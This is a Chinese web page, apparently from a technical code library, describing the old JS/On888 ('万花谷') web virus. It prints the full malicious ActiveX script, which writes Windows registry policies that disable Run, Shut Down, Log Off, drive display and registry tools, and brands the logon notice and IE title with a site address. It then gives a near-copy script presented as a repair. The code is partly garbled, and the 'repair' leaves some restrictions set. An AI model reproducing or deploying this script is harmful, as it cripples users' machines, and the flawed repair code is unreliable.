“万花谷”网页病毒

/*该病毒的技术特征:
  JS/On888是一个新的含有有害代码的ActiveX网页文件,它通过在一个网络地址来对计算机用户造成破坏,其破坏特性如下:
  (1)用户不能正常使用WINDOWS的DOS功能程序;
  (2)用户不能正常退出WINDOWS,
  (3)开始菜单上的"关闭系统"、"运行"等栏目被屏蔽,防止用户重新以DOS方式启动,关闭DOS命令、关闭REGEDIT命令等。
  (4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。*/
<script>
document.write(""); 
    function AddFavLnk(loc, DispName, SiteURL) 
  { 
  var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL"); 
  Shor.TargetPath = SiteURL; 
  Shor.Save(); 
  } 
    function f(){ 
  try 
  { 
  ActiveX initialization 
  a1=document.applets[0]; 
  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
  a1.createInstance(); 
  Shl = a1.GetObject(); 
  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); 
  a1.createInstance(); 
  FSO = a1.GetObject(); 
  a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); 
  a1.createInstance(); 
  Net = a1.GetObject(); 
  try 
  { 
  if (documents .cookies.indexOf("Chg") == -1) 
  { 
  //Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
  "http://www.5lulu.com/"); 
  var expdate = new Date((new Date()).getTime() + (1)); 
  documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoRun", 01, "REG_BINARY"); //消除RUN按纽
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoClose", 01, "REG_BINARY"); //消除关闭按纽
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoLogOff", 01, "REG_BINARY"); //消除注销按纽
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoDrives", "63000000", "REG_DWORD"); //隐藏盘符
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\System\\DisableRegistryTools", "00000001", "REG_DWORD"); //禁止注册表
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\WinOldApp\\Disabled", "00000001", "REG_DWORD"); 
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\WinOldApp\\NoRealMode", "00000001", "REG_DWORD"); 
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
  \\LegalNoticeCaption", "您的计算机已经被http://www.5lulu.com/优化: )"); 
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
  \\LegalNoticeText", "您的计算机已经被http://www.5lulu.com/优化: )"); 
  //设置开机提示
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title",
  "新的标题★http://5lulu.com/ & http://www.5lulu.com/"); 
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", 
  "新的标题★http://5lulu.com/ & http://www.5lulu.com/"); 
  //设置IE标题
  var expdate = new Date((new Date()).getTime() + (1)); 
  documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  } 
  } 
  catch(e) 
  {} 
  } 
  catch(e) 
  {} 
  } 
    function init() 
  { 
  setTimeout("f()", 1000); 
  } 
  init();
  以下是利用一段类似的JavaScript代码修复各项的键值: 
  document.write(""); 
    function AddFavLnk(loc, DispName, SiteURL) 
  { 
  var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL"); 
  Shor.TargetPath = SiteURL; 
  Shor.Save(); 
  } 
    function f(){ 
  try 
  { 
  ActiveX initialization 
  a1=document.applets[0]; 
  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
  a1.createInstance(); 
  Shl = a1.GetObject(); 
  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); 
  a1.createInstance(); 
  FSO = a1.GetObject(); 
  a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); 
  a1.createInstance(); 
  Net = a1.GetObject(); 
  try 
  { 
  if (documents .cookies.indexOf("Chg") == -1) 
  { 
  //Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", 
  "http://www.5lulu.com/"); 
  var expdate = new Date((new Date()).getTime() + (1)); 
  documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoRun", 00, "REG_BINARY"); //修复RUN按纽
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoClose", 00, "REG_BINARY"); //修复关闭按纽
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoLogOff", 00, "REG_BINARY"); //修复注销按纽
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\Explorer\\NoDrives", "00000000", "REG_DWORD"); //取消隐藏盘符
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\System\\DisableRegistryTools", "00000000", "REG_DWORD"); //取消禁止注册表
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\WinOldApp\\Disabled", "00000001", "REG_DWORD"); 
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies
  \\WinOldApp\\NoRealMode", "00000001", "REG_DWORD"); 
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
  \\LegalNoticeCaption", ""); 
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
  \\LegalNoticeText", ""); 
  //重设开机提示
  Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", 
  "Microsoft Internet Explorer"); 
  Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", 
  "Microsoft Internet Explorer"); //重设IE标题
  var expdate = new Date((new Date()).getTime() + (1)); 
  documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  } 
  } 
  catch(e) 
  {} 
  } 
  catch(e) 
  {} 
  } 
    function init() 
  { 
  setTimeout("f()", 1000); 
  } 
  init();
</script>

本文链接 http://tec.5lulu.com/code/w3n6hbw2tr8ib0.html

我来评分 :6
0

转载注明:转自5lulu技术库

本站遵循:署名-非商业性使用-禁止演绎 3.0 共享协议

www.5lulu.com